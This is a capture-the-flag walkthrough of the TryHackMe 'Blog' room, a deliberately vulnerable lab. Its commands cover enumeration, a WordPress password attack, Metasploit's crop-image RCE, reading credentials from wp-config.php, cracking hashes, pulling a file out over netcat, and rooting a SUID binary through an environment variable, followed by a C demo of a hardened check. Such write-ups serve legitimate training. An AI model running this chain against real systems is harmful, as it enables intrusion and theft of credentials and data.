# Blog

**Room Link:** <https://tryhackme.com/room/blog>

## Initial Scan

**Kali**

```
nmap -A $VICTIM
```

<figure><img src="/files/xK16DOrGKjCiMRRPVt09" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/0r0wKTBcn31vOmnIAeqt" alt=""><figcaption></figcaption></figure>

## Scan all ports

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

<figure><img src="/files/bm2dtEio9WSDMDZnQPJ6" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="/files/W07qnf5O9XpyJ50yLezj" alt=""><figcaption></figcaption></figure>

## TCP/445 - SMB

**Kali**

```
smbclient -L //$VICTIM/
```

<figure><img src="/files/5d33v50XTctB52tHxmvn" alt=""><figcaption></figcaption></figure>

**Kali**

```
smbclient //$VICTIM/BillySMB
```

<figure><img src="/files/Qnsk708VSG33JfxPD1Uj" alt=""><figcaption></figcaption></figure>

**Kali**

```
smbget -R smb://$VICTIM/BillySMB
```

<figure><img src="/files/TZUnK2bvP5G0voWqmTUa" alt=""><figcaption></figcaption></figure>

**Kali**

```
steghide extract -sf check-this.png 
cat rabbit_hole.txt 
```

<figure><img src="/files/AoHNJP0ntsNNxw7VpGfG" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP (WordPress)

Browsing to http://$VICTIM/wp-admin redirects to a hostname instead of the IP (http://blog.thm/), so the request fails until the name is resolvable. Adding a line for blog.thm pointing at $VICTIM to /etc/hosts fixes this, and the WordPress login page then loads.

<figure><img src="/files/A14zhmhzI67ruaXe3N3o" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/FcPKKaA0A66vKT5qUosi" alt=""><figcaption></figcaption></figure>

**Kali**

```
wpscan --url http://blog.thm/ --enumerate u
```

<figure><img src="/files/H0K0sbFF0iSwNSrpm1O1" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/zkTP0DYMZuMIyaGrFkFa" alt=""><figcaption></figcaption></figure>

Hydra against the login form was too slow to be practical, but wpscan's built-in password attack found the password quickly.

**Kali**

```
wpscan --url http://blog.thm/ -U kwheel,bjoel -P /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/5mKjtt4cnaAld01RebBn" alt=""><figcaption></figcaption></figure>

After logging in as kwheel the account has few privileges in the dashboard, but the dashboard shows the site is running WordPress 5.0. That version is affected by the authenticated crop-image RCE (CVE-2019-8942 / CVE-2019-8943), which the Metasploit module below exploits; it needs a valid account with at least the Author role, so the cracked kwheel credentials are enough.

<figure><img src="/files/AUn7rew4VrHw1jQmWOAI" alt=""><figcaption></figcaption></figure>

## Initial Shell

**Kali**

```
msfconsole
use exploit/multi/http/wp_crop_rce
set rhosts $VICTIM
set username kwheel        # cracked WordPress account (needs Author role or higher)
set password cutiepie1
run
shell                      # drop from meterpreter to a plain shell
python2 -c 'import pty; pty.spawn("/bin/bash")'   # upgrade to an interactive PTY
id
```

<figure><img src="/files/XKX6GUMunNHKe63ZAKci" alt=""><figcaption></figcaption></figure>

**Victim**

```
# run from the WordPress web root: wp-config.php holds the database credentials
grep -i pass *
```

<figure><img src="/files/istTXJNOWCVayzq44xB4" alt=""><figcaption></figcaption></figure>

**Victim**

```
mysql -u wordpressuser -p    # password from wp-config.php: LittleYellowLamp90!@
show databases;
use blog;
show tables;
select * from wp_users;      # user_login and user_pass (phpass $P$ hashes)
```

<figure><img src="/files/uoeeJKZCrhCYUrQWFWXV" alt=""><figcaption></figcaption></figure>

Cracking the wp_users hashes with john recovered kwheel's password again (cutiepie1), but kwheel has no account on the underlying server. bjoel's hash did not crack with rockyou.

**Kali**

```
# hash.txt holds the user_pass values from wp_users; john detects the phpass format itself
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/CEbZuZqepNpotqpLISPk" alt=""><figcaption></figcaption></figure>

bjoel's home directory contains a PDF (Billy_Joel_Termination_May20-2020.pdf). It is a termination letter, so his account is most likely locked and not worth breaking into. I pulled the file back to Kali with netcat to read it.

**Kali(receiving)**

```
nc -l -p 1234 > Billy_Joel_Termination_May20-2020.pdf
```

**Victim(sending)**

```
cd /home/bjoel
nc -w 3 $KALI 1234 < Billy_Joel_Termination_May20-2020.pdf
```

<figure><img src="/files/nmSON01kvrgW5hhPPerZ" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

**Victim**

```
find / -perm -u=s -type f 2> /dev/null 
```

<figure><img src="/files/3Mk8110qimsKkSpw0Co9" alt=""><figcaption></figcaption></figure>

Among the SUID binaries, /usr/sbin/checker is not a standard one. Running it under ltrace shows that it only checks whether an environment variable named `admin` is set; if it is not, the program exits.

**Victim**

```
cd /usr/sbin
ltrace checker
```

<figure><img src="/files/l6f5SjHpLzvwy2Czm4v9" alt=""><figcaption></figcaption></figure>

Since the environment is fully under the caller's control, exporting an `admin` variable (the value is not checked) and running the binary again gives a root shell immediately.

**Victim**

```
env                  # confirm admin is not set yet
export admin=admin   # any value satisfies the check
env
/usr/sbin/checker    # runs as root (SUID) and spawns a root shell
```

<figure><img src="/files/ZTYIABOrIHdAXokCq3vc" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/vupOt1JXREFc7r6EDguA" alt=""><figcaption></figcaption></figure>
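To make the root cause concrete, here is an added example (my own code, not the room's checker, whose source is not on the page) that reproduces the decision the ltrace output reveals, a setuid-root binary granting privilege because an environment variable exists, next to a hardened version that gates on the kernel-reported real uid/gid instead. The `admin` variable name comes from the walkthrough; the admin group gid (27) and the PATH value used for the clean exec are assumptions for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Environment variable the walkthrough's ltrace output shows being consulted.
   Everything in the environment is chosen by the (unprivileged) caller. */
#define ADMIN_ENV_VAR "admin"

/* Hypothetical gid of an "admin" group the hardened version consults (assumed). */
#define ADMIN_GID 27

/*
 * Vulnerable decision logic.  Returns 1 when the checker would go on to
 * setuid(0) and spawn a shell, 0 when it would exit as "Not an Admin".
 * The only input is getenv(), so `export admin=anything` passes the check.
 */
int vulnerable_would_escalate(void)
{
    return getenv(ADMIN_ENV_VAR) != NULL;
}

/*
 * Hardened decision logic.  The real uid and gid come from the kernel
 * (getuid()/getgid()) and cannot be set by the caller, so gating on them
 * means something.  Root, or a member of the admin group, is allowed through.
 */
int hardened_would_escalate(uid_t real_uid, gid_t real_gid)
{
    if (real_uid == 0) return 1;
    if (real_gid == ADMIN_GID) return 1;
    return 0;
}

/* Reproduce the two states from the walkthrough: before and after
   `export admin=admin`.  The environment is restored afterwards. */
int demo_without_admin_var(void)
{
    unsetenv(ADMIN_ENV_VAR);
    return vulnerable_would_escalate();            /* 0: "Not an Admin" */
}

int demo_with_admin_var(void)
{
    setenv(ADMIN_ENV_VAR, "admin", 1);             /* same as `export admin=admin` */
    int r = vulnerable_would_escalate();           /* 1: would escalate */
    unsetenv(ADMIN_ENV_VAR);
    return r;
}

/*
 * What a setuid helper should do once it has legitimately decided to run
 * something privileged: raise privileges explicitly, check the result, and
 * exec with a scrubbed environment so the caller's PATH/LD_* never reach the
 * child.  Not invoked from main() because it really would exec a shell.
 */
void exec_privileged_shell(void)
{
    char *const argv[] = { "/bin/sh", NULL };
    char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    if (setuid(0) != 0) {
        perror("setuid");
        exit(EXIT_FAILURE);
    }
    execve("/bin/sh", argv, envp);
    perror("execve");
    exit(EXIT_FAILURE);
}

int main(void)
{
    printf("vulnerable checker, admin unset : %s\n",
           demo_without_admin_var() ? "would escalate" : "Not an Admin");
    printf("vulnerable checker, admin=admin : %s\n",
           demo_with_admin_var() ? "would escalate" : "Not an Admin");
    printf("hardened checker, uid=%u gid=%u : %s\n",
           (unsigned)getuid(), (unsigned)getgid(),
           hardened_would_escalate(getuid(), getgid()) ? "allowed" : "refused");
    return 0;
}
```

Compile with `gcc -o checker_demo checker_demo.c` and run it once normally and once after `export admin=admin`: the vulnerable decision flips on the environment alone, while the hardened one only changes if your real uid or gid changes, which an unprivileged user cannot arrange. The same applies to any SUID binary that reads getenv(), PATH lookups, or LD_* variables before deciding what to do, which is why ltrace on an unusual SUID file is the first thing to try.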
